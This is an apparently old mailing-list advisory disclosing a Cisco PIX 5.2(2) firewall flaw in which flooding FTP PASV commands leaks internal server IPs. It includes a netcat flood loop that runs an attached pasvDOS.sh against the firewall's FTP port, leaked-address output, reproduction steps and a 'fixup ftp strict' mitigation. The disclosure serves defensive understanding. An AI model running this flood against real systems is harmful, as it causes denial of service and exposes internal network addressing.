Cisco PIX Firewall allow external users to discover internal IPs

["Fabio Pietrosanti (naif)" <naif () INET IT>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,  Vulnerability in the Subject it's explained here...

Attached file:
- - Script used for DOS pasvDOS.sh
- - Log of the script PIXLOG.first_172_16.bz2 & PIXLOG.second_172_16.bz2
- - Log of debug debug_ftp.txt.bz2
Log of the Latest session against the second pix on which service network
is 192.168.3.0/24 is on:
http://naif.itapac.net/PIXLOG_latest_192_168.bz2
because it's too big for attach in a mlist.

====
PIX TESTED:
Cisco Secure PIX Firewall Version 5.2(2)

Compiled on Sun 24-Sep-00 18:59 by morlee

skifo-pix up 16 hours 55 mins

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.5685, irq 11
1: ethernet1: address is 00e0.b601.cfbd, irq 15
2: ethernet2: address is 00e0.b601.cfbc, irq 10
3: ethernet3: address is 00e0.b601.cfbb, irq 9
4: ethernet4: address is 00e0.b601.cfba, irq 11
5: ethernet5: address is 00d0.b790.512e, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Disabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited

Cisco released 5.2(4) yesterday, and it's time for a 5.2(5) :(

I've tryed to fill  pix memory with the attached pasvDOS.sh shell script piped trought netcat but
i obtained other results...

then from cmd line:

<naif@naif> [~] $ (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do 
(sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&

but before starting the "PASV FLOOD" i start logging my ssh session, so we have log all FTP FIXUP DEBUG...

<naif@naif> [~] $ script debug_ftp.txt

The PIX start revelating me the Real ip of the server immediatelly after
it kick me off from ssh with the following error:

Local: Corrupted check bytes on input.

NOW it start replying to my PASV command with the REAL internal ip address of the server...

===== Normal Situation
227 Entering Passive Mode (xxx,xxx,xxx,xx,18,237)
===== Under this kind of dos, after 21th ftp session that flood pix with PASV
227 Entering Passive Mode (172,16,1,2,6,113)

After i change the PIX and network, on another pix with 5.2(2) and i could receive with
this dos:
227 Entering Passive Mode (192,168,3,2,99,37)
Et voila'...

Trying to reproduce this kind of dos/exploit it works only sometimes...
after a reload it usually works after that:

- - I start  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; 
(./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&
- - I leave it running for some minutes
- - I kill all connection killing the "nc" process
- - Wait for 2/3 minutes
- - Restart with  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do 
(sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&

but i cannot figure why.


I notice that using "fixup ftp strict 21" could block this kind of attack
and error in debug is :

get_cmd: ERR: command not terminated

but it's also true that with "fixup ftp strict 21" many ftp-client doesn't work with ftp server inside the pix...


p.s. all ppl now know that "mork" have to offer me a lunch ;)

Pietrosanti  Fabio (naif)
E-mail: naif () inet it         
PGP Key (DSS)                           http://naif.itapac.net/naif.asc
 --
Free advertising: www.openbsd.org - Multiplatform Ultra-secure OS

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
Filter: gpg4pine 4.1 (http://azzie.robotics.net)

iD8DBQE52bPQdK5I1NnlcMYRAjN7AKDTZSntnK6lmtFqq3r9WtWR6TJnIgCfQ8LN
MhtFpAc2KZMcrcOf82OAaJk=
=uso7
-----END PGP SIGNATURE-----

Attachment: pasvDOS.sh
Description:

Attachment: PIXLOG.first_172_16.bz2
Description:

Attachment: PIXLOG.second_172_16.bz2
Description:

Attachment: debug_ftp.txt.bz2
Description: